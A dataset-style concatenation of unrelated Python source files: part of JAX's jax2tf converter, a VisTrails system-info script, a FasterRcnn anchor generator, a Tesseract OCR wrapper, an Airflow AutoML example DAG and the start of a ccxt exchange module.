raise _xla_path_disabled_error("select_and_scatter_add")
init_value = tf.zeros((), operand.dtype)
select_fn = (tf.function(tf_impl[select_prim], autograph=False)
.get_concrete_function(init_value, init_value))
scatter_fn = _add_fn.get_concrete_function(init_value, init_value)
out = tfxla.select_and_scatter(operand, window_dimensions, window_strides,
padding, source, init_value, select_fn,
scatter_fn)
out.set_shape(_aval_to_tf_shape(_out_aval))
return out
tf_impl_with_avals[lax.select_and_scatter_add_p] = _select_and_scatter_add
def _threefry2x32_jax_impl(*args: TfVal, _in_avals, _out_aval):
res = _convert_jax_impl(
functools.partial(jax._src.random._threefry2x32_lowering,
use_rolled_loops=False),
multiple_results=True)(*args, _in_avals=_in_avals, _out_aval=_out_aval)
return res
tf_impl_with_avals[jax.random.threefry2x32_p] = _threefry2x32_jax_impl
# Use the vmap implementation, otherwise on TPU the performance is really bad
# With use_vmap=True on, we get about the same performance for JAX and jax2tf.
tf_impl_with_avals[random.random_gamma_p] = _convert_jax_impl(
functools.partial(jax._src.random._gamma_impl, use_vmap=True),
multiple_results=False)
def _gather_dimensions_proto(indices_shape, dimension_numbers):
proto = xla_data_pb2.GatherDimensionNumbers()
proto.offset_dims.extend(dimension_numbers.offset_dims)
proto.collapsed_slice_dims.extend(dimension_numbers.collapsed_slice_dims)
proto.start_index_map.extend(dimension_numbers.start_index_map)
assert indices_shape
proto.index_vector_dim = len(indices_shape) - 1
return proto
@functools.partial(bool_to_int8, argnums=0)
def _gather(operand, start_indices, *, dimension_numbers, slice_sizes,
_in_avals, _out_aval):
"""Tensorflow implementation of gather."""
del _in_avals
if not _enable_xla:
raise _xla_path_disabled_error("gather")
proto = _gather_dimensions_proto(start_indices.shape, dimension_numbers)
slice_sizes_tf = _eval_shape(slice_sizes)
out = tfxla.gather(operand, start_indices, proto, slice_sizes_tf, False)
out.set_shape(_aval_to_tf_shape(_out_aval))
return out
tf_impl_with_avals[lax.gather_p] = _gather
def _slice(operand, start_indices, limit_indices, strides):
if strides is None:
strides = [1] * len(start_indices)
slices = tuple(map(slice, start_indices, limit_indices, strides))
return operand[slices]
tf_impl[lax.slice_p] = _slice
def _dynamic_slice(operand, *start_indices, slice_sizes):
# Here we could use tf.slice. Similarly, for lax.gather we can sometimes use
# tf.gather. But those have different semantics for index-out-of-bounds than
# JAX (and XLA). We have tried to force compilation, by wrapping into
# tf.xla.experimental.compile, or tf.function(jit_compile=True), but
# those solutions are brittle because they do not work when nested into an
# outer compilation (see b/162814494 and b/163006262). They also do not
# survive well being put in a SavedModel. Hence, we now use TFXLA slicing
# and gather ops.
if not _enable_xla:
raise _xla_path_disabled_error("dynamic_slice")
res = tfxla.dynamic_slice(operand, tf.stack(start_indices),
size_indices=slice_sizes)
# TODO: implement shape inference for XlaDynamicSlice
res.set_shape(tuple(slice_sizes))
return res
tf_impl[lax.dynamic_slice_p] = _dynamic_slice
def _scatter_dimensions_proto(indices_shape, dimension_numbers):
proto = xla_data_pb2.ScatterDimensionNumbers()
proto.update_window_dims.extend(dimension_numbers.update_window_dims)
proto.inserted_window_dims.extend(dimension_numbers.inserted_window_dims)
proto.scatter_dims_to_operand_dims.extend(
dimension_numbers.scatter_dims_to_operand_dims)
assert indices_shape
proto.index_vector_dim = len(indices_shape) - 1
return proto
def _scatter(operand, scatter_indices, updates, *,
update_jaxpr, update_consts,
dimension_numbers, indices_are_sorted, unique_indices,
_in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue):
del unique_indices, _in_avals
assert len(update_consts) == 0, "Update computation cannot have constants"
if not _enable_xla:
raise _xla_path_disabled_error("scatter")
proto = _scatter_dimensions_proto(scatter_indices.shape, dimension_numbers)
def update_computation(arg1: TfVal, arg2: TfVal) -> TfVal:
closed_jaxpr = core.ClosedJaxpr(update_jaxpr, update_consts)
res, = _interpret_jaxpr(closed_jaxpr, arg1, arg2)
return res
o_spec = tf.TensorSpec((), dtype=operand.dtype)
xla_update_computation = (
tf.function(update_computation, autograph=False).get_concrete_function(o_spec, o_spec))
out = tfxla.scatter(operand, scatter_indices, updates, xla_update_computation, proto,
indices_are_sorted=indices_are_sorted)
# TODO: implement shape analysis for XlaScatter
out.set_shape(_aval_to_tf_shape(_out_aval))
return out
tf_impl_with_avals[lax.scatter_p] = _scatter
tf_impl_with_avals[lax.scatter_min_p] = _scatter
tf_impl_with_avals[lax.scatter_max_p] = _scatter
tf_impl_with_avals[lax.scatter_mul_p] = _scatter
tf_impl_with_avals[lax.scatter_add_p] = _scatter
def _dynamic_update_slice(operand, update, *start_indices):
if not _enable_xla:
raise _xla_path_disabled_error("dynamic_update_slice")
return tfxla.dynamic_update_slice(operand, update, tf.stack(start_indices))
tf_impl[lax.dynamic_update_slice_p] = _dynamic_update_slice
def _cond(index: TfVal, *operands: TfVal,
branches: Sequence[core.ClosedJaxpr],
linear: Sequence[bool]) -> Sequence[TfVal]:
del linear
# tf.cond needs lambdas with no arguments.
branches_tf = [functools.partial(_interpret_jaxpr, jaxpr, *operands)
for jaxpr in branches]
return tf.switch_case(index, branches_tf)
tf_impl[lax_control_flow.cond_p] = _cond
def _while(*args: TfVal, cond_nconsts: int, cond_jaxpr: core.ClosedJaxpr,
body_nconsts: int, body_jaxpr: core.ClosedJaxpr) -> Sequence[TfVal]:
cond_consts, body_consts, init_carry = util.split_list(args, [cond_nconsts,
body_nconsts])
if cond_jaxpr.out_avals[0].shape: # type: ignore[attr-defined]
# The conditional is not a scalar, this must be a batched while
return _batched_cond_while(*args,
cond_nconsts=cond_nconsts, cond_jaxpr=cond_jaxpr,
body_nconsts=body_nconsts, body_jaxpr=body_jaxpr)
# The conditional must return a single value to TF
def cond_tf_func(*args: TfVal) -> TfVal:
pred, = _interpret_jaxpr(cond_jaxpr, *cond_consts, *args)
return pred
body_tf_func = functools.partial(_interpret_jaxpr, body_jaxpr, *body_consts)
return tf.while_loop(cond_tf_func, body_tf_func, init_carry)
def _batched_cond_while(*args: TfVal,
cond_nconsts: int, cond_jaxpr: core.ClosedJaxpr,
body_nconsts: int, body_jaxpr: core.ClosedJaxpr
) -> Sequence[TfVal]:
"""Interprets a while_loop with a batched condition.
A batched while has a conditional that returns a tensor of booleans, and
a body that returns a list of tensors whose leading dimensions match those
of the conditional tensor.
We need to turn it into a while with scalar boolean conditional. We will
expand the loop carry to include a prefix with the current tensor boolean
condition. We prepend to the loop the first calculation of the tensor boolean
condition. The loop condition will use a "reduce_any" to calculate a scalar
boolean from the tensor boolean condition. The end of the loop body will
compute the new carry using a "tf.where", and we compute the new tensor
boolean condition.
"""
cond_consts, body_consts, init_carry = util.split_list(args, [cond_nconsts,
body_nconsts])
# Initial computation of batched condition
init_pred_b, = _interpret_jaxpr(cond_jaxpr, *cond_consts, *init_carry)
assert init_pred_b is not core.unit
def new_cond_tf_func(pred_b: TfVal, *carry: TfVal) -> TfVal:
pred = tf.reduce_any(pred_b, axis=list(range(len(pred_b.shape))))
return pred
def new_body_tf_func(pred_b: TfVal, *carry: TfVal) -> Sequence[TfVal]:
new_carry: Sequence[TfVal] = _interpret_jaxpr(body_jaxpr,
*body_consts, *carry)
def select_one_carry(new_c: TfVal, c: TfVal) -> TfVal:
pred_b_bcast = _broadcast_in_dim(pred_b,
shape=new_c.shape,
broadcast_dimensions=list(range(len(pred_b.shape))))
return tf.where(pred_b_bcast, new_c, c)
selected_carry: Sequence[TfVal] = list(
util.safe_map(select_one_carry, new_carry, carry))
next_pred_b, = _interpret_jaxpr(cond_jaxpr, *cond_consts, *selected_carry)
return (next_pred_b, *selected_carry)
_, *res_carry = tf.while_loop(new_cond_tf_func, new_body_tf_func,
(init_pred_b, *init_carry))
return res_carry
tf_impl[lax_control_flow.while_p] = _while
# We use the scan impl rule to rewrite in terms of while.
tf_impl_with_avals[lax_control_flow.scan_p] = _convert_jax_impl(lax_control_flow._scan_impl)
def _top_k(operand: TfVal, k: int) -> Tuple[TfVal, TfVal]:
# Some types originally incompatible with tf.math.top_k can be promoted
# to a compatible type without loss of precision.
def promote_tf_dtype(tf_dtype):
if tf_dtype in [tf.bool, tf.uint8, tf.uint16]:
return tf.uint32
if tf_dtype in [tf.int8, tf.int16]:
return tf.int32
if tf_dtype is tf.float16:
return tf.float32
return None
conversion_dtype = promote_tf_dtype(operand.dtype)
if conversion_dtype:
values, indices = tf.math.top_k(tf.dtypes.cast(operand, conversion_dtype),
k=k, sorted=True)
return tf.dtypes.cast(values, operand.dtype), indices
else:
return tf.math.top_k(operand, k=k, sorted=True)
tf_impl[lax.top_k_p] = _top_k
def _sort(*operands: TfVal, dimension: int, is_stable: bool,
num_keys: int) -> Tuple[TfVal, ...]:
if not _enable_xla:
raise _xla_path_disabled_error("sort")
assert 1 <= num_keys <= len(operands)
assert all([operands[0].shape == op.shape for op in operands[1:]])
assert 0 <= dimension < len(
operands[0].shape
), f"Invalid {dimension} for ndim {len(operands[0].shape)}"
# The comparator is a 2N-argument TF function, with arguments [2k] and [2k +1]
# corresponding to two scalars from operand[k].
def lexicographic_comparator_old(*tf_args: TfVal) -> TfVal:
assert len(tf_args) == 2 * len(operands)
# We build a comparison:
# arg[0] < arg[1] or (arg[0] == arg[1] and (arg[2] < arg[3] or ...))
# all the way to arg[2 * num_keys - 2] < arg[2 * num_keys - 1]
inside_comparison = None
for key_idx in range(num_keys - 1, -1, -1):
a = tf_args[2 * key_idx]
b = tf_args[2 * key_idx + 1]
a_lt_b = tf.math.less(a, b)
if inside_comparison is None:
inside_comparison = a_lt_b
else:
inside_comparison = tf.math.logical_or(
a_lt_b, tf.math.logical_and(tf.math.equal(a, b), inside_comparison))
return inside_comparison
comparator_spec: List[tf.TensorSpec] = []
comparator_jax_in_avals: List[core.AbstractValue] = []
for op in operands:
o_spec = tf.TensorSpec((), dtype=op.dtype)
comparator_spec.extend([o_spec, o_spec])
o_aval = core.ShapedArray((), to_jax_dtype(op.dtype))
comparator_jax_in_avals.extend([o_aval, o_aval])
# Use the same comparator that JAX uses when compiling to XLA, to get the
# proper NaN/Inf total order, and the lexicographic ordering.
# The comparator is a 2N-argument TF function, with arguments [2k] and [2k +1]
# corresponding to two scalars from operand[k].
def lexicographic_comparator(*tf_args: TfVal) -> TfVal:
return _convert_jax_impl(
lax._sort_lt_comparator, multiple_results=False)(
*tf_args,
_in_avals=comparator_jax_in_avals,
_out_aval=core.ShapedArray((), np.bool_),
num_keys=num_keys)
xla_comparator_computation = (
tf.function(lexicographic_comparator,
autograph=False).get_concrete_function(*comparator_spec))
results = tfxla.variadic_sort(operands, dimension=dimension,
is_stable=is_stable,
comparator=xla_comparator_computation)
return results
tf_impl[lax.sort_p] = _sort
def _fft(x, fft_type, fft_lengths):
FFT, IFFT, RFFT, IRFFT = list(map(xla_client.FftType, [0, 1, 2, 3]))
if fft_type == IRFFT:
expected_lengths = x.shape[-len(fft_lengths):-1] + ((x.shape[-1] - 1) * 2,)
else:
expected_lengths = x.shape[-len(fft_lengths):]
if expected_lengths != fft_lengths:
raise NotImplementedError(
f"Unsupported fft_lengths={fft_lengths} for fft_type={fft_type} of "
f"array with shape={x.shape}.")
tf_funcs = {FFT: [tf.signal.fft, tf.signal.fft2d, tf.signal.fft3d],
IFFT: [tf.signal.ifft, tf.signal.ifft2d, tf.signal.ifft3d],
RFFT: [tf.signal.rfft, tf.signal.rfft2d, tf.signal.rfft3d],
IRFFT: [tf.signal.irfft, tf.signal.irfft2d, tf.signal.irfft3d]}
return tf_funcs[fft_type][len(fft_lengths) - 1](x)
tf_impl[lax_fft.fft_p] = _fft
def _qr(operand, full_matrices):
return tf.linalg.qr(operand, full_matrices=full_matrices)
tf_impl[lax_linalg.qr_p] = _qr
def _svd(operand, full_matrices, compute_uv):
result = tf.linalg.svd(operand, full_matrices, compute_uv)
if not compute_uv:
return result,
s, u, v = result
return s, u, tf.linalg.adjoint(v)
tf_impl[lax_linalg.svd_p] = _svd
def _eig(operand: TfVal, compute_left_eigenvectors: bool,
compute_right_eigenvectors: bool):
if compute_left_eigenvectors and compute_right_eigenvectors:
# TODO(bchetioui): didn't find a 100% reliable, easy and satisfying way to
# sort the left eigenvectors in the right order. The jax.numpy.linalg API
# suggests to me that left eigenvectors are anyway seldom used, so I
# think it is acceptable to leave as unimplemented for now.
msg = ("Conversion of eig is not implemented when both "
"compute_left_eigenvectors and compute_right_eigenvectors are set "
"to True.")
raise NotImplementedError(msg)
elif not (compute_left_eigenvectors or compute_right_eigenvectors):
return tuple([tf.linalg.eigvals(operand)])
elif compute_right_eigenvectors:
return tuple(tf.linalg.eig(operand))
else: # compute_left_eigenvectors == True
wH, vl = tf.linalg.eig(tf.linalg.adjoint(operand))
wHH = tf.math.conj(wH)
return tuple([wHH, vl])
tf_impl[lax_linalg.eig_p] = _eig
def _eigh(operand: TfVal, lower: bool):
if operand.shape[-1] == 0:
v, w = operand, tf.reshape(operand, operand.shape[:-1])
else:
if not lower:
operand = tf.linalg.adjoint(operand)
w, v = tf.linalg.eigh(operand)
cast_type = { tf.complex64: tf.float32
, tf.complex128: tf.float64 }.get(operand.dtype)
if cast_type is not None:
w = tf.cast(w, cast_type)
return v, w
tf_impl[lax_linalg.eigh_p] = _eigh
def _lu(operand: TfVal, _in_avals, _out_aval):
return _convert_jax_impl(lax_linalg._lu_python)(operand, _in_avals=_in_avals,
_out_aval=_out_aval)
tf_impl_with_avals[lax_linalg.lu_p] = _lu
def _triangular_solve(a: TfVal, b: TfVal, *, left_side: bool, lower: bool,
transpose_a: bool, conjugate_a: bool,
unit_diagonal: bool):
if unit_diagonal:
a = tf.linalg.set_diag(a, tf.ones(a.shape[:-1], dtype=a.dtype))
if not left_side:
rank = len(a.shape)
transpose_dimensions = list(range(rank - 2)) + [rank - 1, rank - 2]
a = tf.transpose(a, transpose_dimensions)
b = tf.transpose(b, transpose_dimensions)
lower = not lower
# adjoint == transpose for real dtypes, so special care need only be taken
# for complex types.
if a.dtype in [tf.complex64, tf.complex128]:
if (transpose_a and not conjugate_a) or (not transpose_a and conjugate_a):
a = tf.math.conj(a)
result = tf.linalg.triangular_solve(a, b, lower=lower, adjoint=transpose_a)
if not left_side:
result = tf.transpose(result, transpose_dimensions)
return result
tf_impl[lax_linalg.triangular_solve_p] = _triangular_solve
def _linear_solve(*args: TfVal, const_lengths, jaxprs, _in_avals, _out_aval):
return _convert_jax_impl(lax_control_flow._custom_linear_solve_impl)(
*args, const_lengths=const_lengths, jaxprs=jaxprs, _in_avals=_in_avals, _out_aval=_out_aval)
tf_impl_with_avals[lax_control_flow.linear_solve_p] = _linear_solve
def _custom_jvp_call_jaxpr(*args: TfVal,
fun_jaxpr: core.ClosedJaxpr,
jvp_jaxpr_thunk: Callable,
num_consts: int) -> Sequence[TfVal]:
# TODO(necula): ensure that there is no AD transformation in scope
return _interpret_jaxpr(fun_jaxpr, *args)
tf_impl[custom_derivatives.custom_jvp_call_jaxpr_p] = _custom_jvp_call_jaxpr
def _custom_vjp_call_jaxpr(*args: TfVal,
fun_jaxpr: core.ClosedJaxpr,
**_) -> Sequence[TfVal]:
# TODO(necula): ensure that there is no AD transformation in scope
return _interpret_jaxpr(fun_jaxpr, *args)
tf_impl[custom_derivatives.custom_vjp_call_jaxpr_p] = _custom_vjp_call_jaxpr
def _custom_lin(*args: TfVal, **_) -> Sequence[TfVal]:
raise TypeError("can't apply forward-mode autodiff (jvp) to a custom_vjp "
"function.")
tf_impl[ad.custom_lin_p] = _custom_lin
def split_to_logical_devices(
tensor: TfVal,
partition_dimensions: pxla.PartitionsOrReplicated):
"""Like TPUMPStrategy.experimental_split_to_logical_devices.
For jax2tf purposes we want to avoid needing to thread the `strategy` object
through the generated computation. It seems that the original function needs
the strategy object only for error checking, which we assume is done upstream
by JAX.
Args:
tensor: Input tensor to annotate.
partition_dimensions: A list of integers, with one integer per tensor
dimension, specifying in how many parts the dimension should be split. The
product of integers must equal the number of devices per replica.
use_sharding_op: whether to use a sharding op, or not.
Returns:
an annotated tensor.
"""
# This corresponds to the sharding annotations in
# xla_bridge._sharding_to_proto.
if partition_dimensions is None:
return xla_sharding.replicate(tensor, use_sharding_op=True)
num_partition_splits = np.prod(partition_dimensions)
tile_assignment = np.arange(num_partition_splits).reshape(
partition_dimensions)
return xla_sharding.tile(tensor, tile_assignment, use_sharding_op=True)
def _sharded_call(f: lu.WrappedFun, vals: Sequence[TfVal],
in_parts: Sequence[pxla.PartitionsOrReplicated],
out_parts_thunk,
**_) -> Sequence[Tuple[TfVal, core.AbstractValue]]:
sharded_vals = util.safe_map(split_to_logical_devices, vals, in_parts)
vals_out = f.call_wrapped(*sharded_vals)
out_parts_flat = out_parts_thunk()
assert len(out_parts_flat) == len(vals_out), f"expected {len(out_parts_flat)} == {len(vals_out)}"
sharded_vals_out = [
(split_to_logical_devices(val, val_part), val_aval)
for (val, val_aval), val_part in util.safe_zip(vals_out, out_parts_flat)
]
return sharded_vals_out
def _sharding_constraint(arg: TfVal, *,
partitions: pxla.PartitionsOrReplicated):
return split_to_logical_devices(arg, partitions)
tf_impl[sharded_jit.sharding_constraint_p] = _sharding_constraint
def _register_checkpoint_pytrees():
"""Registers TF custom container types as pytrees."""
m = tf.Module()
# The types here are automagically changed by TensorFlow's checkpointing
# infrastructure.
m.a = (tf.Module(), tf.Module())
m.b = [tf.Module(), tf.Module()]
m.c = {"a": tf.Module()}
tuple_wrapper = type(m.a)
list_wrapper = type(m.b)
dict_wrapper = type(m.c)
# TF AutoTrackable swaps container types out for wrappers.
assert tuple_wrapper is not tuple
assert list_wrapper is not list
assert dict_wrapper is not dict
jax.tree_util.register_pytree_node(
tuple_wrapper, lambda xs: (tuple(xs), None), lambda _, xs: tuple(xs))
jax.tree_util.register_pytree_node(
list_wrapper, lambda xs: (tuple(xs), None), lambda _, xs: list(xs))
jax.tree_util.register_pytree_node(
dict_wrapper,
lambda s: (tuple(s.values()), tuple(s.keys())),
lambda k, xs: dict(zip(k, xs)))
_register_checkpoint_pytrees()
|
py | 1a4bbb59d14a8698f932d5954b91475d669116a0 | #!/usr/bin/env python
###############################################################################
##
## Copyright (C) 2014-2016, New York University.
## Copyright (C) 2011-2014, NYU-Poly.
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: [email protected]
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the New York University nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
# Basic information
import sys
import platform
print "Python:"
print " Basic version: %s.%s.%s" % (sys.version_info[0],
sys.version_info[1],
sys.version_info[2], )
print " Full version: " + sys.version.replace('\n', ' ')
print
def c(s):
return s or "<COULD NOT DETERMINE>"
print "System:"
print " Type: " + c(platform.system())
print " Architecture: " + c(platform.architecture()[0])
print " Machine: " + c(platform.machine())
print " Platform: " + c(platform.platform())
print " Processor: " + c(platform.processor())
print
##############################################################################
print "Libraries:"
try:
import sip
print " sip installed."
print " version: " + sip.SIP_VERSION_STR
except ImportError:
print " sip NOT installed."
print
try:
import PyQt4.Qt
print " PyQt installed."
print " Qt version: " + PyQt4.Qt.QT_VERSION_STR
print " PyQt version: " + PyQt4.Qt.PYQT_VERSION_STR
except ImportError:
print " PyQt NOT installed."
print
try:
import vtk
print " VTK installed."
print " VTK short version: " + vtk.vtkVersion().GetVTKVersion()
print " VTK full version: " + vtk.vtkVersion().GetVTKSourceVersion()
except ImportError:
print " VTK NOT installed."
|
py | 1a4bbc20ec3fed57ac854bfb128ddaf7830589f8 | # Copyright 2020-2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""FasterRcnn anchor generator."""
import numpy as np
class AnchorGenerator():
"""Anchor generator for FasterRcnn."""
def __init__(self, base_size, scales, ratios, scale_major=True, ctr=None):
"""Anchor generator init method."""
self.base_size = base_size
self.scales = np.array(scales)
self.ratios = np.array(ratios)
self.scale_major = scale_major
self.ctr = ctr
self.base_anchors = self.gen_base_anchors()
def gen_base_anchors(self):
"""Generate a single anchor."""
w = self.base_size
h = self.base_size
if self.ctr is None:
x_ctr = 0.5 * (w - 1)
y_ctr = 0.5 * (h - 1)
else:
x_ctr, y_ctr = self.ctr
h_ratios = np.sqrt(self.ratios)
w_ratios = 1 / h_ratios
if self.scale_major:
ws = (w * w_ratios[:, None] * self.scales[None, :]).reshape(-1)
hs = (h * h_ratios[:, None] * self.scales[None, :]).reshape(-1)
else:
ws = (w * self.scales[:, None] * w_ratios[None, :]).reshape(-1)
hs = (h * self.scales[:, None] * h_ratios[None, :]).reshape(-1)
base_anchors = np.stack(
[
x_ctr - 0.5 * (ws - 1), y_ctr - 0.5 * (hs - 1),
x_ctr + 0.5 * (ws - 1), y_ctr + 0.5 * (hs - 1)
],
axis=-1).round()
return base_anchors
def _meshgrid(self, x, y, row_major=True):
"""Generate grid."""
xx = np.repeat(x.reshape(1, len(x)), len(y), axis=0).reshape(-1)
yy = np.repeat(y, len(x))
if row_major:
return xx, yy
return yy, xx
def grid_anchors(self, featmap_size, stride=16):
"""Generate anchor list."""
base_anchors = self.base_anchors
feat_h, feat_w = featmap_size
shift_x = np.arange(0, feat_w) * stride
shift_y = np.arange(0, feat_h) * stride
shift_xx, shift_yy = self._meshgrid(shift_x, shift_y)
shifts = np.stack([shift_xx, shift_yy, shift_xx, shift_yy], axis=-1)
shifts = shifts.astype(base_anchors.dtype)
# first feat_w elements correspond to the first row of shifts
# add A anchors (1, A, 4) to K shifts (K, 1, 4) to get
# shifted anchors (K, A, 4), reshape to (K*A, 4)
all_anchors = base_anchors[None, :, :] + shifts[:, None, :]
all_anchors = all_anchors.reshape(-1, 4)
return all_anchors
|
py | 1a4bbddca481d7c5669e74877f81fc89bb1bb30b | import os
import json
from pytesseract import image_to_data, image_to_string, Output
from ocr_utils import list_files_path, get_files_list
from eval_utils import get_accuracy
from PIL import Image, ImageDraw, ImageFont
class ocr:
def __init__(self, input_dir, output_dir):
self.input_dir = input_dir
self.output_dir = output_dir
self.input_image_list = []
self.output_image_list = []
def load_data(self):
files_path = list_files_path(self.input_dir)
self.input_image_list = get_files_list(files_path)
os.makedirs(os.path.join(self.output_dir, 'texts'), exist_ok=True)
os.makedirs(os.path.join(self.output_dir, 'images'), exist_ok=True)
os.makedirs(os.path.join(self.output_dir, 'jsons'), exist_ok=True)
for im in self.input_image_list:
base_name = os.path.basename(im)
file_name = os.path.splitext(base_name)[0] + "___tess."
self.output_image_list.append(file_name)
def predict(self, output_type='txt'):
for im_in, im_out in zip(self.input_image_list, self.output_image_list):
if output_type == 'txt':
output_path = os.path.join(
os.path.join(self.output_dir, 'texts'), im_out
) + 'txt'
tf = open(output_path, "wt")
result = image_to_string(im_in + "tif", config='--oem 1')
tf.write(result)
tf.close()
elif output_type == 'json':
output_path = os.path.join(
os.path.join(self.output_dir, 'jsons'), im_out
) + 'json'
tf = open(output_path, "w")
dd = image_to_data(im_in + "tif", output_type=Output.DICT)
json.dump(dd, tf, indent=2)
tf.close()
else:
print("ERROR: Unknown format!")
def eval(self, method="char"):
accuracy = []
for gt, of in zip(self.input_image_list, self.output_image_list):
# output_path = self.output_dir + "/texts/" + of + "txt"
output_path = os.path.join(
os.path.join(self.output_dir, "texts"), of
) + "txt"
accuracy.append(get_accuracy(gt + "txt", output_path, method))
try:
print(
"%s based accuracy : %.2f" %
(method, sum(accuracy) / len(accuracy))
)
except TypeError:
print("ERROR: Can't measure accuracy!")
def draw_bb(self):
for im_in, im_out in zip(self.input_image_list, self.output_image_list):
img = Image.open(im_in + 'tif').convert("RGB")
draw = ImageDraw.Draw(img)
font = ImageFont.truetype('Pillow/Tests/fonts/FreeMono.ttf', 40)
json_path = os.path.join(
os.path.join(self.output_dir, 'jsons'), im_out
) + 'json'
tf = open(json_path, "r")
file_json = json.load(tf)
for i in range(len(file_json["level"])):
if file_json["text"][i] != "":
x1 = file_json["left"][i]
y1 = file_json["top"][i]
x2 = file_json["left"][i] + file_json["width"][i]
y2 = file_json["top"][i] + file_json["height"][i]
draw.text(
(x1, y1), file_json["text"][i], fill='red', font=font
)
draw.rectangle(((x1, y1), (x2, y2)), outline='red')
output_path = os.path.join(
os.path.join(self.output_dir, 'images'), im_out
) + 'jpg'
img.save(output_path) |
py | 1a4bbe04c6b791dfb823b628c73dbfb0bbfe548f | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
Example Airflow DAG that uses Google AutoML services.
"""
import os
import airflow
from airflow import models
from airflow.gcp.hooks.automl import CloudAutoMLHook
from airflow.gcp.operators.automl import (
AutoMLCreateDatasetOperator, AutoMLDeleteDatasetOperator, AutoMLDeleteModelOperator,
AutoMLImportDataOperator, AutoMLTrainModelOperator,
)
GCP_PROJECT_ID = os.environ.get("GCP_PROJECT_ID", "your-project-id")
GCP_AUTOML_LOCATION = os.environ.get("GCP_AUTOML_LOCATION", "us-central1")
GCP_AUTOML_TRACKING_BUCKET = os.environ.get(
"GCP_AUTOML_TRACKING_BUCKET",
"gs://automl-video-datasets/youtube_8m_videos_animal_tiny.csv",
)
# Example values
DATASET_ID = "VOT123456789"
# Example model
MODEL = {
"display_name": "auto_model_1",
"dataset_id": DATASET_ID,
"video_object_tracking_model_metadata": {},
}
# Example dataset
DATASET = {
"display_name": "test_video_tracking_dataset",
"video_object_tracking_dataset_metadata": {},
}
IMPORT_INPUT_CONFIG = {"gcs_source": {"input_uris": [GCP_AUTOML_TRACKING_BUCKET]}}
default_args = {"start_date": airflow.utils.dates.days_ago(1)}
extract_object_id = CloudAutoMLHook.extract_object_id
# Example DAG for AutoML Video Intelligence Object Tracking
with models.DAG(
"example_automl_video_tracking",
default_args=default_args,
schedule_interval=None, # Override to match your needs
user_defined_macros={"extract_object_id": extract_object_id},
) as example_dag:
create_dataset_task = AutoMLCreateDatasetOperator(
task_id="create_dataset_task", dataset=DATASET, location=GCP_AUTOML_LOCATION
)
dataset_id = (
'{{ task_instance.xcom_pull("create_dataset_task", key="dataset_id") }}'
)
import_dataset_task = AutoMLImportDataOperator(
task_id="import_dataset_task",
dataset_id=dataset_id,
location=GCP_AUTOML_LOCATION,
input_config=IMPORT_INPUT_CONFIG,
)
MODEL["dataset_id"] = dataset_id
create_model = AutoMLTrainModelOperator(
task_id="create_model", model=MODEL, location=GCP_AUTOML_LOCATION
)
model_id = "{{ task_instance.xcom_pull('create_model', key='model_id') }}"
delete_model_task = AutoMLDeleteModelOperator(
task_id="delete_model_task",
model_id=model_id,
location=GCP_AUTOML_LOCATION,
project_id=GCP_PROJECT_ID,
)
delete_datasets_task = AutoMLDeleteDatasetOperator(
task_id="delete_datasets_task",
dataset_id=dataset_id,
location=GCP_AUTOML_LOCATION,
project_id=GCP_PROJECT_ID,
)
create_dataset_task >> import_dataset_task >> create_model >> \
delete_model_task >> delete_datasets_task
|
py | 1a4bbf05878362e0512e21b7e00910ace5f1366c | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.base.exchange import Exchange
import math
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import DDoSProtection
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.errors import OnMaintenance
class bitz(Exchange):
